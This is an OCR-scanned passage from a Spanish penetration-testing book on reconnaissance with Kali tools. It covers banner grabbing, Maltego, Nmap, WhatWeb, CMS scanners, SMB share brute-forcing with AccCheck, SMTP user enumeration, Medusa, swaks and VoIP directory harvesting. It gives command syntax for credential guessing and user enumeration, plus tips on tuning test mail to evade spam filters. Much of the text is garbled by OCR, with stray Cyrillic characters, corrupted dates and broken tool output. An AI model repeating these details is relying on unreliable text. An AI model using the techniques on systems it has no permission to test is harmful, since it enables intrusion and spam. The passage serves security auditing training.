Dae muaa ar atras .con ESMTP Exim 4.80 #2 Mon, 08 Apr 2013 02:48:08 -0600 
20 -ма do not authorize the use of this system to transport unsolicited, 
[29 and/or bulk e-mail 

bao unrecognized command 

(UNKNOWN) [ӨЫ ЫЕ MO] 25 (smtp) open 

рии шишиши Som ESMTP Exim 4.80 #2 Mon, 68 Apr 2013 02:48:10 -0600 
D20-We do not authorize the use of this system to transport Ungolicited, 
[20 and/or bulk e-mail 

[998 unrecognized command 


(UNKNOWN) Ге 6E 24 (?) : Connection timad out 


(UNKNOWN) [E ] 23 (telnet) : Connection timed out 
(UNKNOWN) ГОМЕ JD] 22 (ssh) open 
Est-2.0-ÜpensSH 5.3 
Protocol mismatch 
KUNKNOWN) [6% MH BRO) 21 (ftp) open 
p20- Welcome to Pure-FTPd [privsep] [TLS] 
user number 9 of 1808 allowed 


D20-Local time is now 82:4 2 

[28-This is a private syst Jl N 
D20-IPV6 connections are al thi > 

220 You will be disconnected after 15 minutes of inactivity. 


Imagen 02.08 Ejemplo del uso de la herramienta netcar. 


En el ejemplo se puede ver como se ha detectado el servicio ESMTP basado en Exim versión 4.8, 
el servicio SSH 2.0 basado en OpenSSH versión 5.3 y un servicio FTP basado en Pure-FTPd de 
versión no detectada (siempre y cuando los banners no se hayan modificado intencionadamente). 


Con ncat, entre sus muchas posibilidades, se puede establecer conexión con un servicio que funcione 
Sobre SSL (Secure Socket Layer), como por ejemplo HTTPS, e interactuar con el servicio para 
extraer la versión del servidor web así como los métodos http soportados: 
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mete charset 
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Imagen 02.09: Petición no exitosa de options con ncar. 


Al parecer se trata de un servidor web Google Front End versión 2.0. Se puede apreciar que el 
método OPTIONS está deshabilitado. A continuación, se ha lazando esta misma consulta sobre otro 
servidor web donde, además de la versión, se observan los métodos soportados por dicho servidor. 


- at set D 


os 


Mon, 08 Apr 2913 89:29:27 GT 
Microsoft -119/6.8 
ic rosoftOf. 


2 
OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN| 
PROPPATCH, LOCK, UNLOCK, SEARCH 
jilow: OPTIONS, TRACE, GET, WEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK 
ache-Control: private E 


Imagen 02.10: Petición exitosa de options con ncar. 


Más adelante se verá cómo herramientas como nmap y derivados, de manera automatizada analizan 
us resultados muestran la versión del servicio detectada. 


estos hanners y entre 


Maltego 

Una de las principales herramientas para realizar el proceso de recolección de información es Maltego, 
de la empresa Paterva. Kali incluye entre su repositorio de herramientas la versión comunitaria. Es, 
similar a la FOCA en planteamiento, permite recolectar información de una manera sencilla, rápida 
y visual (esto último dependerá en gran medida de la cantidad de resultados obtenidos). 
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Imagen 02.11: Ejemplo de la herramienta Maltego. 


"Maltego se basa en entidades, estas entidades son objetos sobre los que se aplicaran determinadas 
acciones que se conocen como transformadas. Las entidades están divididas en dos categorías. 
Por un lado, las entidades relacionadas con las infraestructuras, (que hacen referencia a todos los 
atributos de estas), de las que disponga la compañía, y por el otro, las relacionadas con personas, que 
abarca todos los datos referentes a los trabajadores. 


Al igual que la FOCA, Maltego es capaz de enlazar información de diversas fuentes y obtener un 
mapa de la infraestructura que hay detrás de un determinado dominio, así como de los usuarios 
relacionados con el mismo. Además Maltego tiene compatibilidad con Facebook y Twitter (se echa 
en falta compatibilidad con Linkedin). 


Para demostrar el potencial de la herramienta, se partirá de un domino web y se verá cómo, por 
medio de transformadas, es posible obtener información de los servidores, equipos, cuentas de 
Correo, documentos con sus metadatos, etcétera, 


"A continuación se muestra el proceso de investigación de una determinada infraestructura. 
Suponiendo que únicamente se conoce el nombre del dominio, se le aplicará la siguiente s 
de transformadas: 


cuencia 


- DNS from Domain > Other transforms > Domain using MX (mail server): Transformada 
encargada de intentar obtener los servidores MX asociados al dominio. 


- DNS from Domain > Other transforms > Domain using NS — (name server): Esta 
transformada obtiene los servidores de nombres del dominio. 


BEEN Ah oo ШЕЙ s s 4 
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Imagen 02.12: Obtención de servidores MX y NS con Maltego. 
- бе selecciona el conjunto de servidores obtenidos (MX, NS), Se ejecuta Resolve IP sobi 
todos ellos. 


- Volviendo a agrupar, esta vez sobre las direcciones IPs. Se ejecuta Resolve to ІР > H 
owner detail 


мон @ ште Ө @ шке Ө 


ina 


p M 


Ema Address. Prane Number 


ленип 
Imagen 02.13: Información extraída a partir де un determinado dominio. 
Se observa como el dominio auditado corresponde а la RedIRIS, la red española para Interconexi: 


de los Recursos Informáticos de las universidades y centros de investigación. Una vez que se ойе 
información básica se pueden hacer otras transformaciones para obtener aún más datos: 


- Other trasnforms > To website where IP appear: Con esta transformada se realiz: 
büsquedas por las direcciones IP en los principales buscadores de Internet. 


Imagen 02.14: Inferencia de páginas web que comparten el mismo servidor. 


o el mismo procedimiento se pueden realizar múltiples transformaciones, соп el 
nveniente de que si se hace sin cuidado es posible que se generen tantas relaciones, que la tarea 


pres 
Imagen 02.15: Grafo resultante tras aplicar demasiadas transformadas. 


terminar de describir las bondades de Maltego, existe la posibilidad de ejecutar unos 
d ipts personalizados que se ejecutan de manera remota en servidores externos llamados 
especializados en realizar un determinado tipo de análisis. De forma adicional es posible 
аг nuevas máquinas a deseo del auditor. Las que vienen de serie еп la versión comunitaria son: 


=- Company Stalker: Esta máquina intentará obtener todas las direcciones de correo de 
un determinado dominio y averiguará cuales ofrecen resultados en redes sociales. Además 
obtiene los documentos alojados en el dominio y extrae los metadatos. Requiere como dato 
-.. de entrada el dominio a analizar. 

- Footprint LI: Realiza un footprint de nivel 1 (rápido, básico) sobre un dominio. 

- Footprint L2: Realiza un footprint de nivel 2 (medio) sobre un dominio. 

- - Footprint L3: Realiza un footprint de nivel 3 (intensivo) sobre un dominio. Requiere de 
tiempo y consume muchos recursos. Se recomienda usarlo con cuidado. 

- Person - Email Adress: Intenta obtener las direcciones de correo de una determinada 
persona y averigua los sitios webs en los que aparecen. Requiere como dato de entrada una 
dirección de correo inicial. 

- Prune Leaf Entities: Elimina las entidades sin nodos dependientes. 

- Twitter Digger: Busca una determinada frase como un alias de Twirrer. Es posible que 
esta máquina se vea bloqueada por la API de Twitter al ejecutarse en varias ocasiones. 

- Twitter Geo Location: Intenta encontrar la geolocalización de una determinada persona 
en Twitter utilizando diferentes técnicas. 

- Twitter Monitor: Monitoriza Twitter en busca de los hashtags, y entidades mencionadas 
que aparecen en torno a una determinada frase. 

- URL To Network Add Domain Information: A partir de una URL obtiene información de 
la red y del dominio al que pertenece. 
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Fingerprinting Web 

La Guía de Pruebas OWASP considera la obtención de la firma digital de los servidores wel 
como una tarea esencial para el auditor. Saber el tipo y versión del servidor en ejecución permiti 
determinar vulnerabilidades conocidas, y los exploits apropiados a usar durante el test de intrusión, 


Además de identificar los servicios web, resulta muy importante obtener también los posibles CM: 
(Content management System) o gestores de contenido así como los plugins/addons utilizados 
el mismo. En línea con los dos párrafos anteriores, el proceso de fingerprinting constará de 1 
siguientes pasos: 

- Identificación del servidor web. 

- Identificación del CMS. 

- Identificación de vulnerabilidades y plugins de los CMS. 


Identificación del servidor web 

Tradicionalmente, las herramientas por excelencia utilizadas para realizar esta tarea eran HTT] 
Recon y HTTP Print. El alto número de falsos positivos y la dependencia del éxito del análisis 
una base de datos de firmas webs muy reducida, ha hecho que estas herramientas queden relega: 

a un segundo plano y ya no se encuentren disponibles en suites de seguridad como Kali. En su lu; 
hay que recurrir al análisis del Banner del servicio o de otra serie de herramientas especializadas, 


De la amplia variedad de herramientas de detección de servicios se ha mencionado antes ncat, y 
a continuación se va a explicar un uso puntual del polifacético Nmap, en concreto de su versión 
gráfica zenmap por ser más sencilla de utilizar y mostrar los resultados de manera organizada. La 
herramienta en sí probablemente requeriría un libro adicional para poder explicarla en profundidad. 
En la configuración por defecto Nmap sólo muestra la versión del servicio en caso de estar 
totalmente seguro, sin embargo es posible pedirle con un comando adicional que realice una batería: 
de pruebas para intentar determinar la versión de los distintos servicios. A continuación se muestran 
los resultados obtenidos рог Nmap en una determinada página web utilizando la configuración por. 
defecto, seleccionando el perfil “Quick Scan”. 


ы КЛ 


Ci 
А. 


Imagen 02.16: Análisis básico соп Nmap. 
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obtiene: 


[lae scan report Tor wes айон [Ib MR 


[rest la ше 18.394 latency? 


Service detection perforseó. Please report 
лагает remita at ттр оао отрган 
(вано dans: | 17 address (1 nont up) метей 1^ 
1 60 set tros 


Imagen 02.17: Nmap + detección de versión de los servicios. 


incluso aunque nmap sea capaz de enumerar la versión del servidor, es posible que se 
'un falso positivo. En función de la versión de la herramienta utilizada, los scripts implicados 
T ciones que pueda haber desde el lado del servidor los resultados podrán variar. 


изн өөө 6.25 ( http://nanp org ) t 2813-04-08 17:46 тиз e 
foc чш ат, OU тест?) 


кА 
pt is up (0-3ta Ше). 
» n 


teres porta 
PORT STATE SERVICE VERSION 
NO spem MR oglan 1-3.7 


Imagen 02,18: Detección de los servicios con la versión para Windows de Nmap: 


adicional, y para contrastar datos, resulta conveniente lanzar también la herramienta 
. Esta herramienta será mostrada en el siguiente apartado de esta sección, 


ón del CMS 

de los sitios web implantados se basan en gestores de contenido posteriormente 
lizados, de ahí se deduce la importancia de identificar de qué gestor de contenidos se trata. 

ena herramienta para proceder a su identificación es WharWeb. 


WhatWeb 

WhatWeb identifica los sitios webs. Su intención es responder a la pregunta, 
web?”. WhatWeb reconoce tecnologías web incluyendo gestores de contenido, blogs, análi 
estadístico de paquetes, librerías JavaScript, servidores web, y dispositivos embebidos. 


¿Qué es este sitio 


A modo de ejemplo, se presenta el análisis de dos plataformas completamente diferentes, la primera 
basada en SharePoint de Microsoft y, la segunda basada en WordPres: 


| oon ТФ мпатмео -у мышишшинсищиш=к= ‚в тст 
[/usr/Lib/ruby/1.9.1/rubygems/custom require.rb:36:in "require': iconv will be del 


ow 1382] ASP NET, Country[ SPAIN] [ES], HTTPServeriNic| 

. TP [вши ANM], Ricrosoft-IIS[7.5], Microsoft-Sharepoint(14 

rectlocaton[http; / eiiim AR. SUL. aspx), Title[ 

], Uncommonieaders| sprequestguid, y-sharepointheal thscore, microso| 
Y-Powered-By| ASP. NET 


АЗР МЕТ 19 a free web framework that enables great Web 
applications. Used by millions of developers, it runs some 
of the biggest sites in the world. - homepage: 
nttp://wew.asp.nat/ 


Country 
Description: $ m ongs to. This uses 
t t 
D t tions on updating thej 
database are in the plugin comments 
SPAIN 


Imagen 02.19: Utilización de la herramienta whatweb sobre un CMS SharePoint. 


om/ [200] 
om/ [299] Ceokles[wordpress homepage], Country[UNITED STATES) [| 
. WINS, MITPServerínginxi, IP[76.74.254.126]. NetaGenerator[WordPress.com], 
[OpenGraphProtocol(blog] [249643311490] , OpenSearch ht i e ear c 
hn. xml, htt iom/osd. xml], PasswordFleld[pwi], Script, Title[wors^ress 
Froo Flog Haru], WordPress, X-UA-CompatibleLIE=10], nginx 
ш com/ 


Description: Display the names of cookies in the НТТР headers. The 
values are not returned to save on space. 
String: wordpress homepage 


Country 
Description: Shows the country the IPv4 address belongs to. This uses 
tha 


String UNI "Me 
Module 


database то in the PART TO consents 


ч JUR 


Description: HTML version 5, detected by tne doctype dotlaration 


Imagen 02.20: Utilización de la herramienta whatweb sobre un CMS WordPress. 


El comando ejecutado рага la realización del análisis en ambos casos ha sido “whatweb -v pagina, 
web”, este comando facilita la presentación de la información de manera detallada y por secciones: 


| 
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tificación de vulnerabilidades y plugins de los CMS 
lo a la expansión de determinados gestores de contenido, ha sido necesario el desarrollo 
де aplicaciones especializadas en determinar la versión exacta del gestor y las vulnerabilidades 
asociadas al mismo. Estos gestores de contenido están diseñados para ser modulares, permitiendo 
“incorporar tantos plugins como sean necesarios para personalizar la lógica de la aplicación web, 
ios de ellos han sido desarrollados por programadores ajenos al grupo principal de desarrollo. 
Este tipo de modularidad genera, en muchos casos, gran cantidad de vulnerabilidades que pueden 
de a ser utilizadas para comprometer el sitio web. En base a esto, existen ciertas aplicaciones 
“centradas en analizar, para un determinado gestor de contenido, su versión y plugins asociados. 


Las principales herramientas incluidas en Kali para la realización de esta fase de la auditoría son: 


- BlindElephant: De propósito general, por defecto contiene un listado de plugins de 
Drupal y WordPress. 

| - Nikto: De propósito general. 

- Plecost: Especializada en WordPress. 

= MWpscan: Especializada en WordPress. 


- Јоот$сап: Especializada en Joomla. 


de usar cualquiera de estas herramientas conviene mirar en la ayuda si existe la posibilidad de 
lizar el listado de plugins de manera automática. En BlindElephant se realiza con el argumento 
* y en Nikto con el argumento “-update”. 


lephant 

1 funcionamiento básico de BlindElephant se realiza con el comando “BlindElephant pagina_web 
4 ) cms". Esta herramienta analiza el CMS, y tras estudiar la existencia de determinados plugins en 
el mismo, muestra en los resultados las posibles estimaciones acerca de la versión de la plataforma 
'CMS que se esté analizando. 


2 87-20317 T2131]; 


lo authentication header defined: / 

banner has changed from Microsoft -115/7.5 to Microsoft-HTTPAPI/2.0, thi 
їл place 

уре?мета-вогча revo rs 1orN3a4N2004207420 

Gives info about server settings, CVE-2900-0413, GE -2800-0709, CVE -2009-0 

urityfocus.cos/bid/1688, http://w securityfocus.con/bid/117 


(Tefalse&listBorderssfals: We Been to have authoring access to the FrontPage 


web 
|, 06108473: / vti pvt/service.cnf: Contains mete-information about the web serv 
jer Ramove or Ай. 17 FrontPage is not baing used. 
rvices.cnf: Contains the List of subwebs. Remove or ACL 
server version 1f Adain has changed 


onten: 
and гохе! 
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Plecost 
Para poder utilizar Plecost es necesario conseguir en primer lugar un listado de plugins de WordPress, 
tarea que no es dificil de llevar a cabo pero requiere un paso adicional a la hora de lanzar el escáner, 
JoomScan 
Por último, para ejecutar JoomScan únicamente hay que ejecutar la instrucción “joomscan -u sitio 
web”, con ello se lanzaran una serie de scripts para comprobar la seguridad del sitio, y al igual que. 
Nikto, mostrará el segmento de la dirección RIO cada uno de los fallos de seguridad encontrados, 
Nikto 
Es una de las mejores herramientas de auditoría web, se podría decir que está al nivel de Nmap 
y se complementa perfectamente con la misma. Su comando básico consiste en ejecutar “nikto. 
-h pagina web" y realiza un escáner de todo el sitio web, detectando la versión del servidor, la. 
tecnología utilizada, algunos comportamientos sospechosos como balanceadores de carga, diversas 
vulnerabilidades detalladas, etcétera. 
Nikto es capaz de detectar gran cantidad de vulnerabilidades en servidores web y comprende ul 
enorme abanico de opciones a la hora de llevar a cabo test de intrusión. Al igual que Nmap, Nikto es. 
compatible con Metasploit, lo cual facilita aún más la tarea de explotación. Una de las características 
a destacar es el “Scan Tuning”, que permite personalizar los tipos de test a llevar a cabo durante el 
análisis del equipo objetivo, consiguiendo con ello reducir el ruido generado por la herramienta. A 
continuación se citan los distintos tipos de test que la herramienta es pam de llevar a cabo: 

- Archivos jugosos / Visto en los registros. 

- Fallos de configuración / Archivos por defecto. 

- Descubrimiento de información. 

- Inyecciones (XSS/Scrip/HTML). 

- Obtención de archivos remotos - Dentro de la raíz de la web. i 

- Denegación de servicio. 

- Obtención de archivos remotos - Desde el lado del servidor. 

- Ejecución de comandos - Obtención de Shell remota. 

- Inyección SQL. 

- Subida de archivos. 

- Evasión de autenticación. 

- Identificación de software. 

- Inclusión de código remoto. 


Junto a la anterior característica, también existen distintas técnicas de evasión con el objetivo de 
hacerlo más sigiloso ante IDS/IPS/WAF. Para ello se apoya en la librería de Perl /ibwhisker que 
permite personalizar los paquetes HTTP para eludir firmas. 


En combinación con los anteriores se puede usar la opción mutate, que permite combinar distintas | 
técnicas para enumerar listados de usuarios y directorios. Un dato a destacar es la agresividad de este | 
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„ el cual genera un volumen de tráfico elevado. Como medida de precaución, Nik/o cuenta con 
ión de esperar entre las distintas pruebas un determinado intervalo de tiempo a especificar por 
auditor mediante el argumento "-Pause segundos ”. 


|l igual que el resto de escáneres de CMS, los plugins son cruciales en el funcionamiento de Nikto, 
дие alimentan las distintas técnicas de explotación que es capaz de llevar a cabo. Para consultar la 
ta completa de plugins instalados hay que ejecutar el siguiente comando: “nikto -list plugins”. Al 
(аг el anterior comando mostrará en último lugar las macros definidas. Dichas macros permiten 
binar los plugins a voluntad. 
Defined plugin macros: 
[E 
м; парогі nbe;embedded;report htwl;outdated;cgi;report 


i[;ssl;apache expect xss;headers;apacheusers;mutiple index;subdomain;msgs;auth 
ttpoptions;dictionary;put del test;;cookles;tests;content search;report text; fe 


“ФАП; -OQNUTATE; tosts( report 

(expanded) = ";httpoptions;headers;mut: 
port acheusers;report nbe;cookies; x 
pi;content search:report csv; 
q) 


;report_html ;tests( raport :500) ; report_text;robd 


Imagen 02.22: Macros por defecto en Niko. 


os plugins outdated y subdomain aportan información interesante, Gracias al primero Nikto es 
paz de detectar si la versión de Apache se encuentra desactualizada, si el equipo se encuentra tras 
1 WAF o si es posible que se encuentre tras un balanceador de cargar debido al cambio del banner 
mismo (en cuyo caso sería recomendable realizar más pruebas con herramientas como hping3, 
оше, fragrouter y wafw00f). Por su parte, el plugin subdomain proporciona información sobre 
jibles nombres de dominio con los que seguir con la investigación. 


to también realiza el descubrimiento de interfaces de administración y páginas de login conocidas 
pueden ser objetos de ataques de fuerza bruta. 


redes de ordenadores, SMB (Server Message Block), también conocido como CIFS (Commom 

fernet File System), que significa “Sistema de Archivos Común para Internet” es un protocolo de 

ed diseñado para compartir archivos, impresoras, púertos serie y otros elementos entre nodos de una 
d. Utilizado principalmente en entornos Windows y DOS. 


MB funciona a través de un enfoque cliente-servidor, donde un cliente realiza peticiones específicas 
servidor responde en consonancia. Una sección del protocolo SMB se encarga especificamente 
Л acceso a sistemas de archivos, de manera que los clientes pueden hacer peticiones a un servidor 
archivos. Otras secciones del protocolo SMB se especializan en la comunicación entre procesos 
). El recurso de comunicación entre procesos (IPC), o ipc$, es un recurso de red compartido 

itre equipos que utilizan Microsoft Windows. Este recurso virtual es utilizado para facilitar la . 
municación entre procesos y ordenadores a través de SMB, a menudo para intercambiar datos 

ordenadores autenticados. 
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En sistemas basados en UNIX en lugar de utilizar SMB como tal, se usa Samba, que es 
reimplementación en formato software libre del protocolo SMB/CIFS. 


En Kali se dispone de dos herramientas diseñadas para dicho protocolo, estás herramientas son 
nbtscan y AccCheck. 


nbtscan 

Se trata de una herramienta basada en línea de comandos, (como casi todas las herramientas en Kali), 
que escanea una red local o remota en busca de servidores NETBIOS abiertos, acción considerada 
como el primer paso a la hora de descubrir carpetas compartidas sin protección. Está basada en la 
funcionalidad de la herramienta de Windows nbtstat, pero opera en un rango de direcciones en lugar 
de ceñirse sólo a una. 


En basea lo anteriorno es de extrañar que el funcionamiento de la herramienta requiera exclusivamente 
como parámetro de entrada, bien una única dirección IP “nbtscan 192.168.1.99”, bien un rango d 
direcciones IP "nbtscan -r 192,168.1.0/24”. 


AccCheck 

La herramienta AccCheck se define a sí misma como una herramienta diseñada para intental 
establecer conexión con los recursos virtuales IPC$ y ADMINS, y probar una combinación de: 
usuarios y contraseilas recibidas a través de un diccionario previamente preparado. 


De manera similar al NBTSCAN, AccChcek sólo necesita la introducción mediante argumentos. 
de la dirección IP a auditar o de un archivo con todas las direcciones IP previamente seleccionadas. 
"AccCheck.pl -t 10.10.10.1” si no recibe como parámetro opcional un listado de contraseñas, с 

el argumento “-P” intentará identificarse como administrador con contraseña en blanco y si, por el 
contrario, recibe un listado de usuarios, con el parámetro "-U” intentará identificarse contra todos 
ellos. 


SMTP 


SMTP User Enumeration 

Uno de los métodos utilizados para probar y obtener nombres de usuario y, en definitiva, s 
direcciones de correr, es a través de los parámetros VRFY y EXPN. VRFY, del inglés verify, es 
requerido en el RFC 821y su principal objetivo es verificar la existencia de un usuario en un servido 
web, devolviendo como respuesta el nombre así como el buzón de correo del mismo. 


Si el servidor acepta la petición, puede contestar con un 250, 251, o 252, dependiendo de si 
dirección es válida, es reenviada o bien le es desconocida. Un código 550 implica que la dirección: 


no existe y que el servidor rechazará cualquier mensaje para él. 
[ 


Otra opción para conseguir nombres de usuarios locales sin hacer uso de VRFY y EXPN es mediante 
las cabeceras RCPT TO. Esto es debido a que el servidor debe responder con un código de control 
a cada solicitud RCPT. 
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e puede explotar esta técnica de manera artesanal con Nercat, o su equivalente NCAT, y con 

enta smip-user-enum. La primera requiere establecer comunicación el servidor de correo 
T para ello será necesario reconocer previamente los servidores de la organización con 
y el nmap hasta averiguar en qué servidor se encuentra el gestor de correo junto con el 
el tráfico es normal o SSL. 


— [Starting Nap 6.25 ( httpi//nmap.org ) st 2013-04-09 15:35 Mora de verano romance 
Nmap scan report for sage шю. ез CHEN) 
is up (0.084s latency). 


_ [587/\ср open Р-Р 


ú 1 IP address (1 host up) scanned in 7.22 seconds 
Imagen 02.24: Descubrimiento del servicio SMTP con птар. 


ez realizados los pasos anteriores, la comunicación a mantener con el servidor tendrá la 
jente estructura: 
=  ncat (--ssl) servidor puerto 
220 servidor Banner 
HELO E 
501 HELO requires domain address -> [НЕГО x] | 250... 
- VRFY | EXPN root 
= 502 VRFY command is disabled/Error: command not recognized | 550 user unknown | 
MAIL FROM:root 
250 ...ok 
RCPT TO:root 
504 need fully-qualified adrres|503 nested mail command|550 user unknown|250 ....ok 
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Como se puede observar con un simple vistazo al anterior código este proceso arroja muchos mensajes 
de error y de naturaleza muy variada, por ello, puede resultar recomendable seguir el proceso a mano 
al principio y posteriormente, si se ha encontrado algún fallo que explotar, automatizar el proceso 
con la herramienta sm/p-user-enum. Esta herramienta permite especificar el método de consulta, 
si se quiere preguntar por el nombre de usuario o si, por el contrario, hay que preguntar por la 
dirección completa de correo, además está pensada para utilizar un diccionario tanto de usuarios 
como de direcciones de servidores de correo. La estructura de los argumentos de entrada de la 
herramienta sería la siguiente "smip-user-enuní -M (VRFY|EXPN|RCPT)] {-0 users.txt|-u usuario] 
{-Т servidores.txt|-t servidor] ". 


Otras herramientas multipropósito como Medusa o Metasploit implementan módulos pensados para 
poder explotar esta directiva. 


Medusa es una herramienta pensada para hacer ataques de fuerza bruta contra las interfaces de 
identificación. Sus características clave destacan en su diseño: 
- Disefiada para trabajar en paralelo recurriendo al uso de mültiples hilos. 
- Todos los argumentos de entrada pueden ser especificados de manera flexible mediante. 
el uso de diccionarios. 
- Diseño modular. No requiere modificaciones en el núcleo de la aplicación para extender 
su funcionamiento, Cada módulo de servicio es independiente del resto y se encuentra 
definido en un archivo .mod. 


En concreto, el módulo de medusa encargado de la enumeración de usuarios en servidores SMTP 
se Пата smip-vrfy (el resto de módulos pueden ser enumerados mediante el argumento “-4” y para 
acceder a la ayuda de cada módulo hay que especificar el nombre del módulo eliminado la extensión 
y pasarle el argumento “-q "), los argumentos que requiere para su funcionamiento son: 
- -Msmtp-vrfy: Indica a medusa que el módulo a ejecutar se trata del encargado de enumerar 
cuentas de usuario mediante el método SMTP VRFY (se echa en falta la existencia de algün 
módulo que permita las otras dos opciones). 
- -m EHLO:mensaje: Parámetro opcional a afiadir en el saludo inicial, muchos servidores 
requieren que se indique algo. 
- -U cuentas.txt: Como el propio parámetro indica se trata del listado de usuarios a 
comprobar. 
- p dominio: Del mismo modo, en este punto se especifica el dominio a atacar. 


Por su parte, Metasploit, herramienta que será analizada en profundidad en capítulos posteriores, 
en el módulo auxiliar auxiliary/scanner/smtp/smtp enum es capaz de emplear los métodos VRFY 
y EXPN (tampoco soporta el método RCPT), para conseguir enumerar los nombres de usuario. 
Ünicamente, al igual que en el caso de medusa, requiere que se le especifique el diccionario y el 
MTA/MTAs, con ello sería suficiente para empezar el ataque de fuerza bruta sobre el servidor de 
correo. 
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ве puede terminar un apartado sobre recopilación de información en SMTP sin nombrar la 
jenta SWAKS (Swiss Army Knife for SMTP), que como su nombre indica se trata de “La 


s, y está orientada a probar transacciones SMTP. 


comprobar el comportamiento de estos ante cada tipo de petición y determinar ante qué 
ancias el servidor se encuentra mal configurado o conseguir generar un mensaje de correo 
‚ no sea tratado como spam. Por ejemplo, en determinadas ocasiones será necesario especificar 
iones de envio y de destino válidas, en otras además requerirá credenciales válidos, que en 
a de EHLO se halle un mensaje, que el cuerpo del mensaje no tenga un determinado 
etcétera. Hay que considerar el hecho por el cual si, con el mensaje por defecto, no surge 
error en el envio y el mensaje es considerado como positivo, el servidor se podría considerar 
nte vulnerable a ataques dirigidos mediante spam. 


plo, en muchos correos corporativos el mensaje que genera por defecto la herramienta 
{Ыг los siguientes argumentos: “--server servidor --hello=mensaje --to destinatario --from 
le”, es automáticamente rechazado mostrando como error el código 550 (en caso de ser 
айо por el motor de filtro de contenido). También puede generar entre otros el código 451, 
que el mensaje ha ido a parar al “gray list”. Sin embargo, Gmail y otros servicios lo 
y posteriormente lo envían a la carpeta de spam. Teniendo esto en mente podría ser posible 
ar el comportamiento de los servicios que lo aceptan, estudiar el mensaje de alarma ofrecido 
ificar el mensaje en consonancia, evitando así utilizar ciertas palabras clave o estudiando qué 
vínculos despiertan la alarma del gestor. 


їл 
— 22 ax .googio com ESMIP 1816541584 AB - gast 
-> EMO ucsm.os 

250-mx google.com at your service, [213.97 382042] 
- m 


|." 259 2.1.0 ok хб 46 
ЯСРТ. 10: «dass ctt 
- 258 2.1.5 OK X15165415BAvic. 48 - даяр 
> DATA 
- 354 Go ahead klsiSS4lSBAwic.48 - омир 
290 


more .org/ ehn/code/setks 


This is a test sailing 


6 OK 1365521582 к1в16541584м1с.48 - gesto 


.8,0 closing connection k1i6541584wic.. 


Imagen 02.25: Ejemplo del uso de la herramienta swaks. 
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test Fri, 05 Apr 2013 08:16:06 +0200 өе e * 
O gea h os 5 abr асе 4 dias) + ж 


para mi > 


А ¿Por qué este mensaje se encuentre en la carpeta Spam? Porque es siriar а los mensajes que han detectado los tros de 
spam. Más rtormacón 


This is a test mailing 


СПГ" 


Imagen 02.26: Mensaje de spam en Gmail. 


SNMP 


El protocolo SNMP (Simple Network Management Protocol), que significa “Protocolo Simple 
de Administración de Red”, aunque despectivamente en el mundo de la seguridad también sea 
conocido con el sobrenombre de “Security is Not My Problem”, es un protocolo diseñado para 
facilitar el intercambio de información de administración entre dispositivos de red. Permite a los 
administradores monitorizar el funcionamiento de la red, buscar y resolver incidencias, gestionar su 
crecimiento, etcétera 


Las versiones de SNMP más implantadas son SNMP versión 1 (SNMPv1) y SNMP versión 2 
(SNMPv2) que basan toda su seguridad en una simple palabra conocida como nombre de comunidad, 
De ahí que la última versión SNMPv3 posea cambios significativos con relación a sus predecesores, 
sobre todo en aspectos de seguridad. 


SNMPCHECK 

Kali dispone de la herramienta smmpcheck, diseñada para enumerar toda la información de 
administración de red una vez que ha sido identificada la dirección IP con el argumento “-1” y el 
puerto con el argumento “-р” en el cual está disponible el servicio. Cómo argumentos opcionales 
se encuentra la posibilidad de especificar un nombre de comunidad con el argumento “-c”, o por el 
contrario utilizar la opción “public” y la versión del protocolo usada, con el argumento “-v”. 


Tecnología VoIP 

Al conjunto de protocolos que se usan para enviar señales de voz sobre la red IP se conoce como 
"Protocolos de Voz sobre IP" o "protocolos IP". VoIP hace referencia al conjunto de normas, 
dispositivos y protocolos, (es decir, a la tecnología necesaria) que permiten comunicar la voz sobre 
el protocolo IP. 


En VolP, el cliente establece y origina las llamadas, el sonido recibido a través del micrófono del 
usuario se codifica, se empaqueta y, al llegar al destino, sufre el proceso inverso para reproducirse a 
través de los audífonos del otro usuario. Un ejemplo de esto serían los usuarios de Skype y similares. 
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ta tecnología, y como en otras tantas, los servidores se encargan de gestionar las operaciones 
base de datos. Las operaciones más comunes llevadas a cabo son la contabilidad, la recolección, 
el enrutamiento, la administración, el control del servicio, la gestión de usuarios, etcétera. 


gateways tienen como función principal proveer de interfaces compatibles con la telefonía 
cional, la cual se comportará como una plataforma para los usuarios virtuales. Estos dispositivos 

п los encargados de terminar el enlace de la llamada, es decir, los clientes originan las llamadas y 
с s se encargan de conectarlos al teléfono fijo o móvil deseado. 


mayor ventaja de esta tecnología, que ha facilitado su amplia difusión en las organizaciones, 
ahorro de costes que supone, así como su alta flexibilidad. Sin embargo esta tecnología es 

ible los mismos problemas que tiene el protocolo ЇР, entre los que se pueden encontrar el 
del tráfico, (en este caso de las conversaciones), la denegación de servicio, la suplantación 
[ identidad de uno de los usuarios, etcétera 


cali la mayoría de las herramientas de auditoría de VoIP se encuentran en la categoría de “h 
entas VoIP diseñadas para husmear/envenenar”, no aparece directamente la suite S/PVicious, 
muchas de sus herramientas. Las herramientas que Kali considera orientadas a la recolección 
ión en VoIP que actualmente provee son ACE y enum/AX, Además otro enfoque a mitad 
entre la recolección de información y la intrusión en los sistemas vendría dado por dos de 
¡mientas incluidas en la suite S/PVicious, svmap y svwar. 


VoIP corporativos, diseñada para imitar el comportamiento de un teléfono IP para 
las entradas de nombre y extensión que un determinado teléfono podría mostrar en la 
de su interfaz. La herramienta ha sido diseñada con la idea de que los futuros ataques sean 
a cabo contra los usuarios basados en sus nombres, en lugar de trabajar directamente sobre 
m de audio o sobre las direcciones IP. ACE trabaja usando DHCP, TFTP, y HTTP de cara a 
la tarea de enumeración anteriormente mencionada. 


actualmente soporta la enumeración del directorio corporativo utilizado en los teléfonos /Р 
0 Unified. El funcionamiento sería similar al siguiente: 

= Епуепепа el СОР para conseguir el VVID. 

- Añade la interfaz VLAN de Voz (a partir de ahí todo el tráfico estará marcado con el 
_ VVID). 

Envía peticiones DHCP marcadas con el VVID. 

Decodifica las direcciones IP del servidor TFTP gracias a la opción DHCP 150, 

Envía una petición TFTP al archivo de configuración del teléfono IP. 

Parsea el archivo, aprendiendo el directorio corporativo de direcciones URL. 

Envía peticiones GET HTTP al directorio, 
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- Parsea los datos XML, escribiendo el directorio de usuario en un archivo formateado en 
texto plano. 


El planteamiento de ACE le permite trabajar de dos formas diferentes. Puede descubrir 
automáticamente la dirección IP del servidor TFTP via DHCP, o se le puede especificar dicho 
parámetro como argumento de la herramienta en línea de comandos. 


Se va a presentar a continuación un ejemplo de los dos métodos básicos de funcionamiento. 
